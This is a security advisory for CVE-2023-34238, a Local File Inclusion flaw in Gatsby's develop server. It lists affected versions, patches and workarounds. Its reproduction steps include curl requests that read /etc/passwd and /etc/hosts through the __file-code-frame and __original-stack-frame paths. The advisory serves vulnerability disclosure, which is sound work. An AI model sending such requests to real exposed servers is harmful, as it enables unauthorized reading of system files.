Packages / gatsby / Security

ModerateVulnerabilityGHSA-c6f8-8r25-c4gcCVE-2023-34238Published 9 Jun 2023

Gatsby develop server has Local File Inclusion vulnerability

Your version

Affected releases · gatsby

  • 5.x5.0.0 – 5.9.0Fixed in 5.9.1
  • 4.x4.0.0 – 4.25.6Fixed in 4.25.7
  • 3.x and older0.0.1 – 3.15.0No fix, no longer updated

On 5.x, the newest line:

npm install gatsby@5.9.1
Every release on a timeline
5.x
  1. Affected

    5.0.0 – 5.9.0

    18 releases

  2. Fixed

    5.9.1 – 5.16.1

    34 releases, latest

4.x
  1. Affected

    4.0.0 – 4.25.6

    82 releases

  2. Fixed

    4.25.7 – 4.25.9

    3 releases

3.x
  1. Affected

    3.0.0 – 3.15.0

    45 releases

2.x
  1. Affected

    2.0.0 – 2.32.13

    754 releases

1.x
  1. Affected

    1.0.1 – 1.9.279

    315 releases

0.x
  1. Affected

    0.0.1 – 0.12.48

    100 releases

1351 stable releases of gatsby, oldest to newest, one row per major.

What happens

Impact

The Gatsby framework prior to versions 4.25.7 and 5.9.1 contain a Local File Inclusion vulnerability in the __file-code-frame and __original-stack-frame paths, exposed when running the Gatsby develop server (gatsby develop).

The following steps can be used to reproduce the vulnerability:

# Create a new Gatsby project
$ npm init gatsby
$ cd my-gatsby-site

# Start the Gatsby develop server
$ gatsby develop

# Execute the Local File Inclusion vulnerability in __file-code-frame
$ curl "http://127.0.0.1:8000/__file-code-frame?filePath=/etc/passwd&lineNumber=1"

# Execute the Local File Inclusion vulnerability in __original-stack-frame
$ curl "http://127.0.0.1:8000/__original-stack-frame?moduleId=/etc/hosts&lineNumber=1&skipSourceMap=1"

It should be noted that by default gatsby develop is only accessible via the localhost 127.0.0.1, and one would need to intentionally expose the server to other interfaces to exploit this vulnerability by using server options such as --host 0.0.0.0, -H 0.0.0.0, or the GATSBY_HOST=0.0.0.0 environment variable.

Patches

A patch has been introduced in gatsby@5.9.1 and gatsby@4.25.7 which mitigates the issue.

Workarounds

As stated above, by default gatsby develop is only exposed to the localhost 127.0.0.1. For those using the develop server in the default configuration no risk is posed. If other ranges are required, preventing the develop server from being exposed to untrusted interfaces or IP address ranges would mitigate the risk from this vulnerability.

We encourage projects to upgrade to the latest major release branch for all Gatsby plugins to ensure the latest security updates and bug fixes are received in a timely manner.

Credits

We would like to thank Maxwell Garrett of Assetnote for bringing the __file-code-frame issue to our attention.

For more information

Email us at security@gatsbyjs.com.